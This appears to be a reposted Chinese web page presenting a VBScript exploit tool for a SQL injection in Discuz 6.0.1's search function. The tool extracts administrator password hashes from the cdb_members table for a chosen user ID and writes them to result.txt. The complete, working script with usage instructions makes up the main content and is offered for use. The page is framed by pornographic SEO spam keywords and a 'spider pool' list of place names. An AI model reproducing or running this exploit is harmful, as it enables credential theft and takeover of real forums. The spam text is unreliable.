国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

discuz 任意管理員密碼漏洞利用工具 vbs代碼

2020-06-26 18:20:36
字體:
供稿:網(wǎng)友
打算考慮寫個python版的,考慮大家的機(jī)器環(huán)境還是弄了個vbs版
 
也利于修改 
以下是search.inc.php 文件漏洞利用代碼VBS版 
復(fù)制代碼代碼如下:

Dim strUrl,strSite,strPath,strUid 
showB() 
Set Args = Wscript.Arguments 
If Args.Count <> 3 Then 
ShowU() 
Else 
strSite=Args(0) 
strPath=Args(1) 
strUid=Args(2) 
End If 
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" 
Set objXML = CreateObject("Microsoft.XMLHTTP") 
objXML.Open "POST",strSite & strPath & "index.php", False 
objXML.SetRequestHeader "Accept", "*/*" 
objXML.SetRequestHeader "Accept-Language", "zh-cn" 
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
objXML.SetRequestHeader "User-Agent", "wap" 
objXML.send(strUrl) 
wscript.echo(objXML.ResponseText) 
Sub showB() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("Exploit discuz6.0.1") 
.Echo("Code By Safe3") 
.Echo("+--------------------------=====================------------------------------+") 
End with 
End Sub 
Sub showU() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("用法:") 
.Echo(" cscript "&.ScriptName&" site path uid") 
.Echo("例子:") 
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") 
.Echo("+--------------------------=====================------------------------------+") 
.Quit 
End with 
End Sub 

獲得的密碼大家自己在result.txt中查找

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 那坡县| 甘南县| 青海省| 凤凰县| 通山县| 张家港市| 潞西市| 台南县| 盐边县| 清涧县| 沁水县| 梅河口市| 秀山| 咸宁市| 隆昌县| 宜昌市| 郓城县| 桑日县| 舟曲县| 时尚| 和平县| 瑞丽市| 洪洞县| 舞阳县| 兰州市| 靖州| 叶城县| 山阳县| 景宁| 朔州市| 城步| 尉氏县| 灵宝市| 保德县| 黎川县| 南和县| 桑植县| 岚皋县| 潼关县| 班玛县| 福泉市|